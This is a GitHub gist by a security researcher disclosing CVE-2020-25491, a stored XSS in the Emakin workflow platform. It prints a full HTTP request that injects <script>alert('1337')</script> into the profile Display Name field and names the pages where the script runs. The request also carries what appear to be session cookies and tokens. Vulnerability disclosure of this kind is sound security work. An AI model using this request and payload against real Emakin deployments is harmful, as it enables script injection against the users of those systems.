Skip to content

Instantly share code, notes, and snippets.

@mhmtayberk
Last active Dec 6, 2021
Embed
What would you like to do?
CVE-2020-25491

What is Emakin?

Emakin is Process Improvement, Teamwork, Mobility, Compatibility, Safety and Security, Reduced Costs, Higher Revenue, Single Platform software for Businesses.

Companies using Emakin include VakıfBank, Ülker, Katılım Emeklilik, Sabancı, Aegon, Eczacıbaşı, Godiva, Tarsim, A101, Near East Bank and various other institutions.

Based on the companies using Emakin, we can say that the software is used extensively in the Turkey.

What is CVE-2020-25491?

CVE-2020-25491 is a basic Stored XSS. The vulnerability is simple.

The "Display Name" field in the profile editing area (https://vulnerable.com/app/#/profile) in the top menu is affected by the related vulnerability.

Request:

POST /rpc/membership/setProfile HTTP/1.1
Host: vulnerable.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 807
Origin: https://vulnerable.com
Connection: close
Referer: https://vulnerable.com/app/
Cookie: _fbp=fb.2.1598889391208.495488426; cultPref=en-US; cookieToken=D5D4DB9DB3DAD8D77D8C522DCF252136F15DAA85C5F217D42F34EAB79E6F30D346CE7128F84A53911E9E81B947E4ED4D2384F649CDCE2ED20FC53ED1E6CAC816977884D841DD7EAAA9C378E9CB37F51103E7A42B; AKOpenAuth=C52389963AF70A290721BC7C7B4BE9F062152850C92C5C9B48AB80ED00EFCCF074D63D56C2C340EC61802827BEAFF995; .ASPXAUTH=5F48AA8100055D6A13A71418D07796D507B770DA1FD64EC7BBBF367E464FD06A585C11D72EB6383F6E05465862E7025FA37498078450FB797AC4E2EC0DDA1BC99FB0E76B389F78F64F3DA853290CFE4D124E9BAE40F0F231C1C61756483B5A0E7645D713181693BBF1927933791D5D0EBAF52FE1A30A1829E6B7DF795152E333F85719315F606AE9383EF427CC842F1D4B15D12D178108E332CE7387AC74EE932B0300853BF62B000BC321A49B28CDD983D70DABFB45E1565DAD7068FC6C4CD201EE40171A31694C554F0470206EEC1DA1A505D0

{"profile":"<UserProfile><Properties><Name/><Surname/><DisplayName>&lt;script&gt;alert('1337')&lt;/script&gt;</DisplayName><EMailAddress>mail@vulnerable.com</EMailAddress><Language Caption=\"English (American Samoa)\">en-AS</Language><DateFormat Caption=\"Auto Format\"/><Theme Caption=\"Default\"/></Properties><DomainTheme>Blocks</DomainTheme><Themes><Theme>Blocks</Theme><Theme>Blue</Theme><Theme>Clean</Theme><Theme>Sun</Theme></Themes><Ticket>E52FEF99EB0C4A5FED7AE7AF917040A732C0C69182F331CBC4D0F3F0689246AB1E61492A11C75F61E0989CA9B09E553E7FBA7E7F850D9F872E5FE3BCAFC38359C3E01C53D8E83D2FABE270455C200866182ADDBA</Ticket><Logons><Logon><Provider>Organization</Provider></Logon><Logon><Provider>LDAP</Provider></Logon></Logons><ImageFile Caption=\"\" Url=\"\"/><ImageUrl/></UserProfile>"}

You can see the payload is: <script>alert('1337')</script>

Then you can see that the vulnerability is triggered on the Activity Stream (https://vulnerable.com/app/#/activitystream) and Work Item (https://vulnerable.com/app/#/workitem/WorkItemId) pages.

For more details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-25491

For more blogposts: https://ayberk.ninja/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment